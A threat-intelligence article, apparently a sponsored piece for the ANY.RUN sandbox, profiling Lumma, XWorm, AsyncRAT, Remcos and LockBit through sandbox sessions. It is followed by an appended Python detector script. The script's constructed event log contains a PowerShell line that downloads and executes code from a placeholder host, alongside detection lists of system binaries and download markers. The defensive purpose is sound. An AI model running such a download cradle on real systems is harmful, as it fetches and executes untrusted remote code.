THEHACKERNEWS.COM
Top 5 Malware Threats to Prepare Against in 2025
Jan 08, 2025 | The Hacker News | Malware Analysis / Threat Intelligence

2024 had its fair share of high-profile cyber attacks, with companies as big as Dell and TicketMaster falling victim to data breaches and other infrastructure compromises. In 2025, this trend will continue. So, to be prepared for any kind of malware attack, every organization needs to know its cyber enemy in advance. Here are 5 common malware families that you can start preparing to counter right now.

Lumma

Lumma is a widely available malware designed to steal sensitive information. It has been openly sold on the Dark Web since 2022. This malware can effectively collect and exfiltrate data from targeted applications, including login credentials, financial information, and personal details.

Lumma is regularly updated to enhance its capabilities. It can log detailed information from compromised systems, such as browsing history and cryptocurrency wallet data. It can be used to install other malicious software on infected devices. In 2024, Lumma was distributed through various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.

Analysis of a Lumma Attack

Proactive analysis of suspicious files and URLs within a sandbox environment can effectively help you prevent Lumma infection. Let's see how you can do it using ANY.RUN's cloud-based sandbox. It not only delivers definitive verdicts on malware and phishing along with actionable indicators but also allows real-time interaction with the threat and the system.

Take a look at this analysis of a Lumma attack.

[Image: ANY.RUN lets you manually open files and launch executables]

It starts with an archive which contains an executable. Once we launch the .exe file, the sandbox automatically logs all processes and network activities, showing Lumma's actions.

[Image: Suricata IDS informs us about a malicious connection to Lumma's C2 server]

It connects to its command-and-control (C2) server.

[Image: Malicious process responsible for stealing data from the system]

Next, it begins to collect and exfiltrate data from the machine.

[Image: You can use the IOCs extracted by the sandbox to enhance your detection systems]

After finishing the analysis, we can export a report on this sample, featuring all the important indicators of compromise (IOCs) and TTPs that can be used to enrich defenses against possible Lumma attacks in your organization.

Try all features of ANY.RUN's Interactive Sandbox for free with a 14-day trial.

XWorm

XWorm is a malicious program that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data. XWorm allows attackers to monitor victims' activities by tracking keystrokes, capturing webcam images, listening to audio input, scanning network connections, and viewing open windows. It can also access and manipulate the computer's clipboard, potentially stealing cryptocurrency wallet credentials. In 2024, XWorm was involved in many large-scale attacks, including ones that exploited Cloudflare tunnels and legitimate digital certificates.

Analysis of an XWorm Attack

[Image: Phishing emails are often the initial stage of XWorm attacks]

In this attack, we can see the original phishing email, which features a link to a Google Drive page.

[Image: A Google Drive page with a download link to a malicious archive]

Once we follow the link, we are offered a password-protected archive for download.

[Image: Opened malicious archive with a .vbs file]

The password can be found in the email. After entering it, we can access a .vbs script inside the .zip file.

[Image: XWorm uses MSBuild.exe to persist on the system]

As soon as we launch the script, the sandbox instantly detects malicious activities, which eventually lead to the deployment of XWorm on the machine.

AsyncRAT

AsyncRAT is another remote access trojan on the list. First seen in 2019, it was initially spread through spam emails, often exploiting the COVID-19 pandemic as a lure. Since then, the malware has gained popularity and been used in various cyber attacks.

AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record a victim's screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch attacks that overwhelm targeted websites.

In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of complex attacks involving scripts generated by AI.

Analysis of an AsyncRAT Attack

[Image: The initial archive with an .exe file]

In this analysis session, we can see another archive with a malicious executable inside.

[Image: A PowerShell process used for downloading a payload]

Detonating the file kicks off the execution chain of XWorm, which involves the use of PowerShell scripts to fetch additional files needed to facilitate the infection.

Once the analysis is finished, the sandbox displays the final verdict on the sample.

Remcos

Remcos is a malware that has been marketed by its creators as a legitimate remote access tool. Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, etc.

In 2024, campaigns to distribute Remcos used techniques like script-based attacks, which often start with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 by leveraging malicious XML files.

Analysis of a Remcos Attack

[Image: Phishing email opened in ANY.RUN's Interactive Sandbox]

In this example, we are met with another phishing email that features a .zip attachment and a password for it.

[Image: cmd process used during the infection chain]

The final payload leverages Command Prompt and Windows system processes to load and execute Remcos.

[Image: MITRE ATT&CK matrix provides a comprehensive view of the malware's techniques]

The ANY.RUN sandbox maps the entire chain of attack to the MITRE ATT&CK matrix for convenience.

LockBit

LockBit is a ransomware primarily targeting Windows devices. It is considered one of the biggest ransomware threats, accounting for a substantial portion of all Ransomware-as-a-Service (RaaS) attacks. The decentralized nature of the LockBit group has allowed it to compromise numerous high-profile organizations worldwide, including the UK's Royal Mail and India's National Aerospace Laboratories (in 2024).

Law enforcement agencies have taken steps to combat the LockBit group, leading to the arrest of several developers and partners. Despite these efforts, the group continues to operate, with plans to release a new version, LockBit 4.0, in 2025.

Analysis of a LockBit Attack

[Image: LockBit ransomware launched in the safe environment of the ANY.RUN sandbox]

Check out this sandbox session, showing how fast LockBit infects and encrypts files on a system.

[Image: ANY.RUN's Interactive Sandbox lets you see static analysis of every modified file on the system]

By tracking file system changes, we can see it modified 300 files in less than a minute.

[Image: Ransom note tells victims to contact attackers]

The malware also drops a ransom note, detailing the instructions for getting the data back.

Improve Your Proactive Security with ANY.RUN's Interactive Sandbox

Analyzing cyber threats proactively instead of reacting to them once they become a problem for your organization is the best course of action any business can take. Simplify it with ANY.RUN's Interactive Sandbox by examining all suspicious files and URLs inside a safe virtual environment that helps you identify malicious content with ease. With the ANY.RUN sandbox, your company can:

- Swiftly detect and confirm harmful files and links during scheduled checks.
- Investigate how malware operates on a deeper level to reveal its tactics and strategies.
- Respond to security incidents more effectively by collecting important threat insights through sandbox analysis.

Try all features of ANY.RUN with a 14-day free trial.

This article is a contributed piece from one of our valued partners.
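As an added example that is not part of the original article or of ANY.RUN's tooling, the script below runs two defender-side heuristics over a constructed, sandbox-style event log: it flags the script host to PowerShell/MSBuild chains described in the XWorm, AsyncRAT and Remcos sessions, and the burst of file modifications seen in the LockBit session. All event data, process names, paths and thresholds are constructed assumptions for illustration.

```python
# Added example (not ANY.RUN's code): two detector heuristics run over a constructed,
# sandbox-style event log. Field order: (ts_seconds, kind, pid, ppid, image, detail).
from collections import deque

EVENTS = [  # constructed process events modelled on a sandbox process tree
    (0.0, "process", 100, 1,   "explorer.exe",   ""),
    (1.0, "process", 200, 100, "wscript.exe",    "invoice.vbs"),  # .vbs from the phishing archive
    (2.0, "process", 300, 200, "powershell.exe",
     "-nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"),
    (3.0, "process", 400, 300, "msbuild.exe",    "C:\\Users\\Public\\build.xml"),
    (10.0, "process", 500, 100, "notepad.exe",   ""),
]
# constructed file events: 300 modifications in 30 s, like the LockBit session
EVENTS += [(20.0 + i * 0.1, "file", 600, 100, "lockbit.exe",
            f"C:\\Users\\user\\Documents\\doc{i}.txt") for i in range(300)]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "msbuild.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest")


def detect_script_chain(events):
    """Return (child, parent, reason) tuples for suspicious parent/child process pairs."""
    procs = {e[2]: e for e in events if e[1] == "process"}
    findings = []
    for _ts, kind, _pid, ppid, image, detail in events:
        if kind != "process" or ppid not in procs:
            continue
        parent, child = procs[ppid][4].lower(), image.lower()
        if parent in SCRIPT_HOSTS and child in LOLBINS:  # VBScript -> PowerShell/cmd stage
            findings.append((child, parent, "script host spawned system binary"))
        if child == "powershell.exe" and any(m in detail.lower() for m in DOWNLOAD_MARKERS):
            findings.append((child, parent, "powershell download cradle"))  # payload fetch
        if child == "msbuild.exe" and parent not in {"devenv.exe", "msbuild.exe"}:
            findings.append((child, parent, "msbuild outside a build context"))  # persistence
    return findings


def detect_mass_modification(events, window_sec=60.0, threshold=100):
    """Return (image, count) for the first process modifying >= threshold files in window_sec."""
    recent = {}  # pid -> timestamps of its file modifications inside the sliding window
    for ts, kind, pid, _ppid, image, _detail in events:
        if kind != "file":
            continue
        q = recent.setdefault(pid, deque())
        q.append(ts)
        while ts - q[0] > window_sec:
            q.popleft()
        if len(q) >= threshold:
            return image, len(q)
    return None
```

The threshold of 100 files per minute is a constructed starting point; tune it against the baseline of legitimate bulk writers (backup agents, compilers) in your own environment before alerting on it.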